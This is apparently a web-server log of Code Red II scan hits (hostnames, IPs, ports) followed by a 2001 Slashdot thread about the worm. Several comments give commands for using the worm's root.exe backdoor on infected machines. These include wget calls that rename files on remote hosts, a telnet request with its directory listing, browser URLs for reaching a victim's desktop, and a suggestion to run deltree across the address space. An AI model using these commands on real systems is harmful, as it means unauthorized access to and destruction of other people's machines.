17:48:46.847613 82 h00d0b7aae700.ne.mediaone.net:3340
17:50:45.075031 82 h0000b4aab5d3.ne.mediaone.net:4444
17:50:45.525336 82 h0000b4aab5d3.ne.mediaone.net:4444
17:50:46.038720 82 h0000b4aab5d3.ne.mediaone.net:4444
17:53:41.214093 66 66.31.103.8:1104
17:53:41.741649 66 66.31.103.8:1104
17:53:42.292439 66 66.31.103.8:1104
17:58:25.250308 66 h00a0cc65dafd.ne.mediaone.net:4008
17:58:25.699150 66 h00a0cc65dafd.ne.mediaone.net:4008
17:58:26.193852 66 h00a0cc65dafd.ne.mediaone.net:4008
18:01:42.732898 66 66.31.63.221:1968
18:01:43.221104 66 66.31.63.221:1968
18:01:43.727629 66 66.31.63.221:1968
18:02:40.305859 82 h0000b4aab5d3.ne.mediaone.net:4545
18:02:40.775736 82 h0000b4aab5d3.ne.mediaone.net:4545
18:02:41.276412 82 h0000b4aab5d3.ne.mediaone.net:4545
18:10:04.114976 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:04.575032 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:05.090142 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:26.320653 82 66.31.90.18:4930
18:10:26.857307 82 66.31.90.18:4930
18:10:27.367300 82 66.31.90.18:4930
18:19:26.919274 66 66.121.141.35:1497
18:19:29.805117 66 66.121.141.35:1497
18:19:32.173330 66 66.31.103.8:4009
18:19:35.989912 66 66.121.141.35:1497
18:19:38.772854 66 66.31.103.8:4009
18:21:41.317501 66 66.31.19.147:3137
18:21:41.818342 66 66.31.19.147:3137
18:21:42.331541 66 66.31.19.147:3137
18:27:52.950866 66 66.31.119.51:3345
18:27:53.553234 66 66.31.119.51:3345
18:27:54.048585 66 66.31.119.51:3345
18:31:17.268443 66 66.31.103.8:1696
18:31:17.829718 66 66.31.103.8:1696
18:31:18.366996 66 66.31.103.8:1696
18:35:51.218420 66 h005004e76369.ne.mediaone.net:3776
18:36:58.682052 66 66.31.134.132:4090
18:36:59.129858 66 66.31.134.132:4090
18:36:59.630050 66 66.31.134.132:4090
18:39:29.188936 82 66.31.90.18:1650
18:39:29.622501 82 66.31.90.18:1650
18:39:30.118453 82 66.31.90.18:1650
18:43:26.132491 66 66.31.185.167:3771
18:43:26.614625 66 66.31.185.167:3771
18:43:27.129779 66 66.31.185.167:3771
18:44:25.438253 66 66.31.34.197:1097
18:44:25.963355 66 66.31.34.197:1097
18:44:26.466727 66 66.31.34.197:1097
18:46:56.491135 82 h0000b4aab5d3.ne.mediaone.net:1961
18:46:56.957798 82 h0000b4aab5d3.ne.mediaone.net:1961
18:46:57.460238 82 h0000b4aab5d3.ne.mediaone.net:1961
18:50:39.557280 66 66.31.19.147:1088
18:50:40.017639 66 66.31.19.147:1088
18:50:40.534323 66 66.31.19.147:1088
19:01:31.666048 66 66.31.19.147:1418
19:01:32.148542 66 66.31.19.147:1418
19:01:32.667597 66 66.31.19.147:1418
19:04:32.656488 66 66.31.110.214:2229
19:04:33.160366 66 66.31.110.214:2229
19:04:33.632996 66 66.31.110.214:2229
19:05:52.903592 66 h0000b49dc596.ne.mediaone.net:3123
19:05:53.349706 66 h0000b49dc596.ne.mediaone.net:3123
19:05:53.888686 66 h0000b49dc596.ne.mediaone.net:3123
19:09:50.609974 66 66.31.110.214:1256
19:09:51.154162 66 66.31.110.214:1256
19:09:51.680749 66 66.31.110.214:1256
19:11:03.591419 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:11:04.038952 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:11:04.560143 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:13:00.373239 66 66.31.176.78:2697
19:13:00.885214 66 66.31.176.78:2697
19:13:01.411488 66 66.31.176.78:2697
19:13:36.557801 66 66.31.19.147:4827
19:13:37.009486 66 66.31.19.147:4827
19:13:37.546756 66 66.31.19.147:4827
19:14:01.915179 66 h005004e76369.ne.mediaone.net:3132
19:17:49.472740 82 66.20.90.161:1188
19:17:50.706806 82 66.20.90.161:1188
19:17:51.205373 82 66.20.90.161:1188
19:17:51.260347 66 66.31.110.214:1805
19:17:51.777707 66 66.31.110.214:1805
19:17:52.274677 66 66.31.110.214:1805
19:18:18.146159 66 66.31.19.147:2433
19:18:18.610886 66 66.31.19.147:2433
19:18:19.093770 66 66.31.19.147:2433
19:24:03.258744 66 h005004e76369.ne.mediaone.net:2709
19:25:59.513734 66 h005004e76369.ne.mediaone.net:4876
19:31:10.452058 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:10.995839 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:11.520479 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:42.818299 66 66.31.23.222:3614
19:31:43.341462 66 66.31.23.222:3614
19:31:43.832391 66 66.31.23.222:3614
19:35:33.305615 66 66.31.23.222:2329
19:35:33.858879 66 66.31.23.222:2329
19:35:34.380045 66 66.31.23.222:2329
19:36:15.488788 82 66.31.90.18:3920
19:36:15.919015 82 66.31.90.18:3920
19:36:16.416156 82 66.31.90.18:3920
19:37:18.674745 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:19.141809 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:19.639118 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:24.595907 66 66.31.34.197:2631
19:37:25.073936 66 66.31.34.197:2631
19:37:25.565188 66 66.31.34.197:2631
19:40:03.296489 66 66.31.219.14:3213
19:40:03.743324 66 66.31.219.14:3213
19:40:04.250018 66 66.31.219.14:3213
19:40:52.479756 66 66.47.109.44:1952
19:40:52.983786 66 66.47.109.44:1952
19:45:48.666308 66 66.31.103.8:1354
19:45:49.199602 66 66.31.103.8:1354
19:45:49.762800 66 66.31.103.8:1354
19:48:43.717171 66 66.31.119.51:4949
19:48:44.224199 66 66.31.119.51:4949
19:48:44.735539 66 66.31.119.51:4949
19:55:45.300803 66 h005004e76369.ne.mediaone.net:3881
19:57:47.694040 66 66.72.102.56:2366
19:57:54.438890 66 66.72.102.56:2366
19:57:58.796383 66 66.31.63.221:3454
19:57:59.280563 66 66.31.63.221:3454
19:57:59.785846 66 66.31.63.221:3454
20:03:57.649227 66 66.8.138.149:1328
20:03:58.262279 66 66.8.138.149:1328
20:03:58.862178 66 66.8.138.149:1328
20:04:57.092114 66 66.31.185.167:4905
20:04:57.668327 66 66.31.185.167:4905
20:04:58.228124 66 66.31.185.167:4905
20:07:35.614262 82 h00d0b7aae700.ne.mediaone.net:1964
20:07:36.084504 82 h00d0b7aae700.ne.mediaone.net:1964
20:07:36.597473 82 h00d0b7aae700.ne.mediaone.net:1964
20:08:48.105066 66 66.31.19.147:4928
20:08:48.596219 66 66.31.19.147:4928
20:08:49.105219 66 66.31.19.147:4928
20:13:58.866231 66 66.31.110.214:2123
20:13:59.346348 66 66.31.110.214:2123
20:13:59.850031 66 66.31.110.214:2123
20:15:24.291724 66 168.191.87.14:3837
20:15:27.257603 66 168.191.87.14:3837
20:15:32.075376 66 168.191.87.14:3837
20:23:47.414620 66 h005004e76369.ne.mediaone.net:2972
20:28:35.272954 66 66.31.185.167:2469
20:28:35.930940 66 66.31.185.167:2469
20:28:36.466283 66 66.31.185.167:2469
20:34:01.123468 66 66.31.134.132:1852
20:34:01.564138 66 66.31.134.132:1852
20:34:02.072934 66 66.31.134.132:1852
20:39:16.574358 66 66.31.119.51:4249
20:39:17.174922 66 66.31.119.51:4249
20:39:17.717080 66 66.31.119.51:4249
20:39:38.389574 66 66.31.185.167:1473
20:39:38.910794 66 66.31.185.167:1473
20:39:39.792199 66 66.31.185.167:1473
20:50:33.690912 66 66.31.154.13:3908
20:50:34.188717 66 66.31.154.13:3908
20:50:34.666215 66 66.31.154.13:3908
20:51:26.698337 82 66.108.14.19:4641
20:51:27.234215 82 66.108.14.19:4641
20:51:27.851212 82 66.108.14.19:4641
20:54:39.440536 66 66.31.182.114:2421
20:54:39.939779 66 66.31.182.114:2421
20:54:40.478663 66 66.31.182.114:2421
20:59:23.096409 66 66.31.19.147:4982
20:59:23.651718 66 66.31.19.147:4982
20:59:24.104612 66 66.31.19.147:4982
20:59:55.992071 66 66.31.110.214:3859
20:59:56.994188 66 66.31.110.214:3859
20:59:57.512260 66 66.31.110.214:3859
21:07:16.914349 66 h0020780443d3.ne.mediaone.net:4414
21:07:17.415319 66 h0020780443d3.ne.mediaone.net:4414
21:07:17.884111 66 h0020780443d3.ne.mediaone.net:4414
21:09:45.978620 66 66.31.93.113:2343
21:09:46.459449 66 66.31.93.113:2343
21:09:46.964479 66 66.31.93.113:2343
21:11:19.500644 66 66.31.142.16:4666
21:11:19.982867 66 66.31.142.16:4666
21:11:20.490040 66 66.31.142.16:4666
21:20:45.663095 66 h005004e76369.ne.mediaone.net:1904
21:20:49.129672 66 66.31.176.78:3738
21:20:49.594183 66 66.31.176.78:3738
21:20:50.101531 66 66.31.176.78:3738
21:22:05.996973 66 66.31.119.51:3563
21:22:06.505440 66 66.31.119.51:3563
21:22:07.008934 66 66.31.119.51:3563
21:22:18.541396 66 h005004e76369.ne.mediaone.net:3485
21:24:16.676478 66 66.27.194.28:4941
21:24:17.231783 66 66.27.194.28:4941
21:24:17.813206 66 66.27.194.28:4941
21:25:42.561997 66 h005004e76369.ne.mediaone.net:1796
21:26:05.362410 66 66.65.7.216:3089
21:26:05.902204 66 66.65.7.216:3089
21:26:06.379554 66 66.65.7.216:3089
21:28:00.078502 66 h005004e76369.ne.mediaone.net:1066
21:29:10.417433 66 h0020780443d3.ne.mediaone.net:1929
21:29:10.888167 66 h0020780443d3.ne.mediaone.net:1929
21:29:11.393278 66 h0020780443d3.ne.mediaone.net:1929
21:37:02.743336 66 h005004e76369.ne.mediaone.net:3971
21:43:05.435234 82 66.31.90.18:1966
21:43:08.374029 82 66.31.90.18:1966
21:43:14.401388 82 66.31.90.18:1966
21:45:17.561709 66 h000102677395.ne.mediaone.net:2000
21:45:17.998424 66 h000102677395.ne.mediaone.net:2000
21:45:18.499826 66 h000102677395.ne.mediaone.net:2000
21:55:05.915115 66 h005004e76369.ne.mediaone.net:3185
22:08:23.023150 66 h0000b49dc596.ne.mediaone.net:4634
22:08:23.557906 66 h0000b49dc596.ne.mediaone.net:4634
22:08:24.144216 66 h0000b49dc596.ne.mediaone.net:4634
22:09:12.966844 66 66.31.244.129:2952
22:09:13.537797 66 66.31.244.129:2952
22:09:14.041465 66 66.31.244.129:2952
22:24:18.203210 66 66.31.110.214:3110
22:24:18.690633 66 66.31.110.214:3110
22:24:19.156846 66 66.31.110.214:3110
22:26:41.235110 66 h000102677395.ne.mediaone.net:1964
22:26:42.005716 66 h000102677395.ne.mediaone.net:1964
22:26:42.772255 66 h000102677395.ne.mediaone.net:1964
22:28:18.796708 66 66.31.176.78:3969
22:28:19.269487 66 66.31.176.78:3969
22:28:19.764580 66 66.31.176.78:3969
22:28:35.194390 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:28:35.750994 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:28:36.274949 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:33:25.496157 66 66.31.244.129:2010
22:33:26.031236 66 66.31.244.129:2010
22:33:26.561286 66 66.31.244.129:2010
22:37:47.320547 82 66.31.90.18:1081
22:37:47.803008 82 66.31.90.18:1081
22:37:48.291875 82 66.31.90.18:1081
22:38:49.048073 82 66.31.90.18:2910
22:38:49.603072 82 66.31.90.18:2910
22:38:50.120720 82 66.31.90.18:2910
22:45:53.412650 82 h0000b4aab5d3.ne.mediaone.net:1196
22:45:53.922510 82 h0000b4aab5d3.ne.mediaone.net:1196
22:45:54.422061 82 h0000b4aab5d3.ne.mediaone.net:1196
22:49:30.259622 66 h00c04ff51cd7.ne.mediaone.net:3364
22:49:30.800502 66 h00c04ff51cd7.ne.mediaone.net:3364
22:49:31.313960 66 h00c04ff51cd7.ne.mediaone.net:3364
22:51:33.085732 66 h005004e76369.ne.mediaone.net:2700
22:52:59.708929 66 66.21.239.11:4366
22:53:00.190556 66 66.21.239.11:4366
22:53:00.686654 66 66.21.239.11:4366
22:54:23.964379 66 66.31.252.167:4770
22:54:24.480645 66 66.31.252.167:4770
22:54:24.990684 66 66.31.252.167:4770
22:54:58.617700 82 h0000b4aab5d3.ne.mediaone.net:4643
22:54:59.053355 82 h0000b4aab5d3.ne.mediaone.net:4643
22:54:59.562599 82 h0000b4aab5d3.ne.mediaone.net:4643
22:58:24.200320 82 h00d0b7aae700.ne.mediaone.net:2439
22:58:24.692829 82 h00d0b7aae700.ne.mediaone.net:2439
22:58:25.192211 82 h00d0b7aae700.ne.mediaone.net:2439
23:02:38.224189 66 h005004e76369.ne.mediaone.net:2539
23:04:04.079205 66 66.31.219.14:1687
23:04:04.566883 66 66.31.219.14:1687
23:04:05.054512 66 66.31.219.14:1687
23:04:12.680565 66 66.31.142.16:2751
23:04:13.112318 66 66.31.142.16:2751
23:04:13.637844 66 66.31.142.16:2751
23:06:33.553378 66 66.31.252.167:4922
23:06:34.026042 66 66.31.252.167:4922
23:06:34.526973 66 66.31.252.167:4922
23:07:36.167238 66 h0050dabb01ca.ne.mediaone.net:4166
23:07:37.233513 66 h0050dabb01ca.ne.mediaone.net:4166
23:07:37.775333 66 h0050dabb01ca.ne.mediaone.net:4166
23:14:11.353025 66 h0050dabb01ca.ne.mediaone.net:1081
23:14:12.114457 66 h0050dabb01ca.ne.mediaone.net:1081
23:14:12.963133 66 h0050dabb01ca.ne.mediaone.net:1081
23:19:47.570412 66 h005004e76369.ne.mediaone.net:1692
23:23:02.185940 66 66.31.182.114:1400
23:23:02.654633 66 66.31.182.114:1400
23:23:03.149660 66 66.31.182.114:1400
23:25:03.618435 66 66.31.182.114:4104
23:25:04.091462 66 66.31.182.114:4104
23:25:04.618119 66 66.31.182.114:4104
23:29:11.714033 66 66.31.252.167:2418
23:29:12.233030 66 66.31.252.167:2418
23:29:12.742194 66 66.31.252.167:2418
23:38:22.485507 82 h0000b4aab5d3.ne.mediaone.net:2540
23:38:22.966452 82 h0000b4aab5d3.ne.mediaone.net:2540
23:38:23.471937 82 h0000b4aab5d3.ne.mediaone.net:2540
23:42:36.438459 82 h00a0cc3b6d03.ne.mediaone.net:4347
23:42:36.918165 82 h00a0cc3b6d03.ne.mediaone.net:4347
23:42:37.424684 82 h00a0cc3b6d03.ne.mediaone.net:4347
23:49:06.169691 66 h005004e76369.ne.mediaone.net:2708
23:54:37.467552 66 66.31.23.222:2406
23:54:38.024616 66 66.31.23.222:2406
23:54:38.526598 66 66.31.23.222:2406
00:03:26.283151 82 66.31.53.226:2367
00:03:26.783434 82 66.31.53.226:2367
00:03:27.308776 82 66.31.53.226:2367
00:30:06.486684 66 66.31.103.8:2572
00:30:07.011765 66 66.31.103.8:2572
00:30:07.526475 66 66.31.103.8:2572
00:30:39.764217 66 h0050dabb01ca.ne.mediaone.net:4145
00:30:40.228938 66 h0050dabb01ca.ne.mediaone.net:4145
00:30:40.741150 66 h0050dabb01ca.ne.mediaone.net:4145
00:35:24.020443 66 66.31.154.13:3635
00:35:24.544329 66 66.31.154.13:3635
00:35:25.070547 66 66.31.154.13:3635
00:36:10.709933 66 66.24.101.118:2258
00:36:11.234919 66 66.24.101.118:2258
00:36:11.745215 66 66.24.101.118:2258
00:37:22.135560 66 h000102677395.ne.mediaone.net:1693
00:37:22.710775 66 h000102677395.ne.mediaone.net:1693
00:37:23.159650 66 h000102677395.ne.mediaone.net:1693
00:40:02.028227 66 h005004e76369.ne.mediaone.net:1586
00:46:21.303078 66 66.31.176.78:2229
00:46:21.807640 66 66.31.176.78:2229
00:46:22.274141 66 66.31.176.78:2229
01:21:16.483721 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:21:16.973122 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:21:17.474816 82 h00a0cc3b6d03.ne.mediaone.net:3494
01:45:55.123115 66 h0050dabb01ca.ne.mediaone.net:4010
01:45:55.584579 66 h0050dabb01ca.ne.mediaone.net:4010
01:45:56.084967 66 h0050dabb01ca.ne.mediaone.net:4010
01:46:05.080026 66 h005004e76369.ne.mediaone.net:2495
01:46:19.448977 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:19.921529 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:20.442538 66 h00c04ff51cd7.ne.mediaone.net:1781
01:46:55.337709 66 h00105a22d072.ne.mediaone.net:4983
01:46:55.839717 66 h00105a22d072.ne.mediaone.net:4983
01:46:56.392686 66 h00105a22d072.ne.mediaone.net:4983
01:47:09.796381 66 h00105a22d072.ne.mediaone.net:1428
01:47:10.276086 66 h00105a22d072.ne.mediaone.net:1428
01:47:10.811053 66 h00105a22d072.ne.mediaone.net:1428
01:47:18.500196 66 h00105a22d072.ne.mediaone.net:1691
01:47:19.028113 66 h00105a22d072.ne.mediaone.net:1691
01:47:19.579917 66 h00105a22d072.ne.mediaone.net:1691
01:47:27.595175 66 h00105a22d072.ne.mediaone.net:1963
01:47:28.104053 66 h00105a22d072.ne.mediaone.net:1963
01:47:28.646113 66 h00105a22d072.ne.mediaone.net:1963
01:49:04.483718 66 h00c04ff51cd7.ne.mediaone.net:1970
01:49:04.964339 66 h00c04ff51cd7.ne.mediaone.net:1970
01:49:05.486200 66 h00c04ff51cd7.ne.mediaone.net:1970
01:50:48.239598 66 h000102677395.ne.mediaone.net:2151
01:50:48.795367 66 h000102677395.ne.mediaone.net:2151
01:50:49.320730 66 h000102677395.ne.mediaone.net:2151
01:50:50.803870 66 208.196.23.183:4684
01:50:51.609295 66 208.196.23.183:4684
01:50:52.418740 66 208.196.23.183:4684
01:51:10.695161 66 h0020780443d3.ne.mediaone.net:1686
01:51:11.141443 66 h0020780443d3.ne.mediaone.net:1686
01:51:11.649209 66 h0020780443d3.ne.mediaone.net:1686
01:57:28.927295 66 h00a0cc65dafd.ne.mediaone.net:2387
01:57:29.419477 66 h00a0cc65dafd.ne.mediaone.net:2387
01:57:29.915338 66 h00a0cc65dafd.ne.mediaone.net:2387
01:59:45.318955 82 h0010a4b2ec27.ne.mediaone.net:1738
01:59:46.046086 82 h0010a4b2ec27.ne.mediaone.net:1738
01:59:46.540815 82 h0010a4b2ec27.ne.mediaone.net:1738
02:00:34.621898 82 h0000b4aab5d3.ne.mediaone.net:4203
02:00:35.140900 82 h0000b4aab5d3.ne.mediaone.net:4203
02:00:35.647869 82 h0000b4aab5d3.ne.mediaone.net:4203
02:01:19.026076 66 66.31.34.197:3530
02:01:19.537435 66 66.31.34.197:3530
02:01:20.037510 66 66.31.34.197:3530
02:02:54.574322 66 h0050dabb01ca.ne.mediaone.net:4667
02:02:55.078305 66 h0050dabb01ca.ne.mediaone.net:4667
02:08:45.746726 82 h00d0b7aae700.ne.mediaone.net:3915
02:08:46.207120 82 h00d0b7aae700.ne.mediaone.net:3915
02:08:46.712318 82 h00d0b7aae700.ne.mediaone.net:3915
02:10:50.960570 66 h0050dabb01ca.ne.mediaone.net:2134
02:10:51.495640 66 h0050dabb01ca.ne.mediaone.net:2134
02:10:52.005772 66 h0050dabb01ca.ne.mediaone.net:2134
02:12:27.539188 66 h0000b49dc596.ne.mediaone.net:4114
02:12:28.059970 66 h0000b49dc596.ne.mediaone.net:4114
02:12:28.570862 66 h0000b49dc596.ne.mediaone.net:4114
02:13:38.080598 66 h0050dabb01ca.ne.mediaone.net:2717
02:13:38.516787 66 h0050dabb01ca.ne.mediaone.net:2717
02:13:39.015100 66 h0050dabb01ca.ne.mediaone.net:2717
02:17:01.162745 66 h005004e76369.ne.mediaone.net:1637
02:19:48.014875 66 h005004e76369.ne.mediaone.net:1514
02:20:16.174304 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:16.742444 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:17.180213 82 h0010a4b2ec27.ne.mediaone.net:2503
02:20:26.455462 66 h0050dabb01ca.ne.mediaone.net:2050
02:20:26.946521 66 h0050dabb01ca.ne.mediaone.net:2050
02:20:27.416633 66 h0050dabb01ca.ne.mediaone.net:2050
02:22:50.732375 66 h005004e76369.ne.mediaone.net:1867
I agree that you have a point, but I don't think it's just the size of the installed base. Most Redhat users probably have a greater understanding of the need to keep their system patched...and Linux doesn't hide all the details of the system from the user in the way that Windows does. It's quite possible that many home Win2k users don't even know that they are running IIS at all, much less that they need to keep informed about exploits and patches for such.
Linux tends to encourage its users to learn more about the workings of their system, in my opinion. Windows tends to encourage people to think of their computer as an "appliance" that they don't have to worry about.
when will you people realize that code red is not just another worm that will fade away soon.. code red makes not only IIS webservers vulnerable.. but any service with an available exploit. i'm talking about the "code red algorithm" that it uses to scan the ip's and spread so fast. this is what makes code red so special.. and this is why we'll be having more of this soooner than you guys think.. its DDOS days all over again..
Will be 3 lines then:
l .exe+infected.dat"
. exe+infected.dat"
x plorer.exe+infected.dat"
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+shel
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+root
wget "http://$REMOTE_ADDR/scripts/root.exe?/c+ren+c:\e
If anybody hasn't noticed, there is usually shell.exe also in scripts dir.
__
L.
-S
--- What parts of "shall make no law", "shall not be infringed", and "shall not be violated" don't you understand?
I just thought of something.... what would happen if everyone running Apache (or another SECURE httpd) put a default.ida file in their server. Of course, it wouldn't be just any old file... it would be a web page with embedded scripts which would take advantage of OTHER known exploits in M$' IIS/PWS. The scripts could do anything we wanted; INCLUDING cleaning the host of the worm by patching and rebooting the system. Now THAT would be a hell of a hack, if indeed it could be done.
/. community think? Is something like this feasible, or am I just talking out of my ass?
What does the
Does anyone even care about this site anymore? Ever since I've stopped regularly visiting Slashdot, I swear my blood pressure has dropped. All the fucking Linux zealots just got to me. Wake up, people.
you're the millionth guy to suggest it, and it's still a stupid idea
Comment removed based on user account deletion
Unbelivalble. Now script kiddies don't even need to do their own hacking, just run a webserver and pick hacked machined from the log.
The question is how large the MS community will grow before it kills itself off with something like this, not whether it will happen....
Most ACs are not even worth the keystrokes to insult them. Be generically insulted and ignored otherwise.
Run a scan against the entire address space with a modified version of the above.. only use "deltree" instead of dir. Should fix the problem.
grep "default.ida?" access_log | cut -d' ' -f7 | sort | uniq -c
Aren't you the Wipo Troll?
> telnet x.x.x.x 80 /scripts/root.exe?/c+dir HTTP/1.0
. ..
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 09:35:11 GMT
Content-Type: application/octet-stream
Volume in drive D has no label.
Volume Serial Number is A8A2-CE97
Directory of d:\inetpub\scripts
2001-06-03 04:12a <DIR>
2001-06-03 04:12a <DIR>
2001-06-13 09:07a 289 default.asp
2001-06-13 09:07a 289 default.htm
2001-06-13 09:07a 289 index.asp
2001-06-13 09:07a 289 index.htm
2000-01-10 09:00p 310,544 root.exe
5 File(s) 311,700 bytes
2 Dir(s) 353,468,416 bytes free
Connection closed by foreign host.
I safety test pot everyday and its still not sold at Walmart. MS endangers data everyday and its doing just fine. Go figure...
That is probably the smartest thing I've ever heard anyone say on slashdot. Ever. Someone Show their skills and write a variant that will run the patch (obviously not locally if they dont have it) from a remote server. Yeah you can hate MS all you want but until someone does something about it we're all going to be sucking bad HTTP requests.
This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running of DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isnt patched against Code Red, chances are it isn't patched against SANDMIND, too.
Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).
Logs available upon request, etc.
I was scanned 340 times yesterday, and as of 7:30 am today I have seen 130 scans. This is WAY more than earlier in the week. I was only getting 20-30/Day. The mainstream press seems to think this thing has gone away, but they are wrong. I have noticed a significantly slower net the last few days on my cable modem.
grep default.ida access_log | awk '{print $1}' | sort | uniq | wc -l
155 unique IP's.
grep default.ida access_log | awk '{print $1}' | wc -l
232 Total Hits
grep default.ida access_log | grep home.com | awk '{print $1}' | sort | uniq | wc -l
32 Uniqe @amp;home hits.
grep default.ida access_log | grep home.com | awk '{print $1}' | wc -l
96 Total @amp;home hits.
Yeah, most attacks are definitely coming from the block I'm on. ::sigh::
Read: Rabbit Rue - Free serial nove
You've been trolled.
127 = his own machine. and he said IIS.
i have an old 486 running freesco as my broadband splitting device. klogd must be going crazy. since i got back home this morning it has rejected TONS of attempts on port 80. i suspected it was code red of course, but what bugged me was that it was mostly coming from my neighbors in 24.167, a few more in 24.something else, and an occasional one from a different class A. i thought code red was random. and then this story pops up. make sense. well its been fun all day going to http://insert.victim.ip.here/. :) there must be others doing the same since i get this once in a while:
HTTP 403.9 - Access Forbidden: Too many users are connected
Are you pondering what I'm pondering?
So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).
So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?
I think we might be seeing some rather impressive DDoS attacks by this evening.
Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...
Oh yeah, since you can't enter command to the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.
I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.
I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps omeone with WinNT skills could offer some ideas?
Monkey sense
or...
- Operating systems don't have wheels.
I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.
The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.
--
Strangely enough, most of the servers I get the XXXX/NNNN requests from, do not accept connections on port 80. Go figure.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it. This is probably the biggest problem, in that every copy of Win2k server installed on any box is also a webserver. What do you want to design badly today?
"The first time I got drunk, I got married. The second time I bought a chimpanzee, after that I stayed sober" Arian Seid
Checking my web logs, I only see 1 Code Red IIs. Thankfully, running IIS, all my servers do is say "huh?" and log it.
"The price of freedom is eternal vigilance." - Thomas Jefferson
- reverse DNS is not done everywhere. It would be so easy to track things down if forward and reverse DNS were in sync
- email aliases like abuse, webmaster and hostmaster are not common on windows-machines.
- email aliases like abuse, webmaster and hostmaster are not common under domains.
- whois-servers of ccTLD are often hard to find or inoperative (hint to ICANN: we *NEED* whois!)
I really hate these webservers which give me an unreadable (prolly some asian font) page, without any clue on who to inform.
Of the more than 100 unique messages I send out this weekend, more than 80% completly bounced because there was no abuse/webmaster/hostmaster alias.
Anyway, I don't foresee any job-problems for people who try to educate internet-newbies with common rules like reverse dns and aliases for common mail-names...
bash$
Damn. I use ADSL and i was sensible. The 176 people i counted attacking my Apache server are OBVIOUSLY fools with Win2k.
I have now made a neat perl script called default.ida to log attacks to my mysql db. When does the hurting stop?
Weevil
ghaa.
Let's count the number of remote expoits for apache and IIS and decide which system is more secure
A pity that this won't actually give you any kind of realistic indication as to how insecure they actually are.
To do that you'd also need to know how many attempts to find exploits on each were made. It's more likely that Apache just hasn't been hammered on as much.
Simon
Coming soon - pyrogyra
Yeah, and you're attitude is the reason why we occasionnally have to scrape the jocks' brains (or what little of it that they had) from the library floor...
RWXS is not what I call a permission system, and if it is, its a very course grained system, certainly not usable on an everyday file server. And yes I'm serious. Imagine templates for a word processor. A group needs to read and write them. A group needs to read them. All other users must not have access. Can't do it with rwxs, and most Unix shops don't (they use Windows and Netware for file servers).
Windows users get to choose between an actual VMS / Trusted Nix style permission system or nothing at all. That's choice.
Most services can be chrooted, but they're not. The FHS doesn't even care about chrooted services - they should be standard. Most services don't need root privileges (yay capabilities), but they use them.
I prefer Linux over Windows for my own work, but for others, the best tool for the job is Windows.
Just checked my logs... Great, I'm on fucking dialup and there's a stupid worm bouncing invalid requests off port 80 of a Linux box I have setup to do NAT. Normally I wouldn't condone drastic measures, but I think ISPs (broadband or otherwise) should start logging the IPs their boxes are getting hit with and if the IP matches that of a customer - BOOM! there goes their access! Finally, envoke TOS for a useful purpose! If the user(s) in question want restored access, they must either update their affected Microsoft product, change to a better OS or STOP RUNNING ANY TYPE OF WEBSERVER if the ISP's terms of service forbids running a webserver.
These ID10Ts need to patch their 'doze boxen or get the hell off the Internet.
---
DRM is like antifreeze, to the MPAA/RIAA it's sweet, to the consumers it's poison.
The way I see it, we are all reaping the foul harvest MS has sown. I can't even imagine the amount of bandwidth being wasted on these stupid worms. I don't use MS server products, but because of this their crappiness is STILL affecting me...and us all.
Short of someone writing an illegal patch-worm, this could be seriously difficult to stop. There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.
We need to see MS get some serious bad press for this, or it won't end. It's getting out of control (judging by the fact that my home Apache server is being hit with this new strain every 5 seconds...literally), and I think it's time MS killed the monster they created and got a little more proactive about finding and notifying the people who are running these unpatched installs...
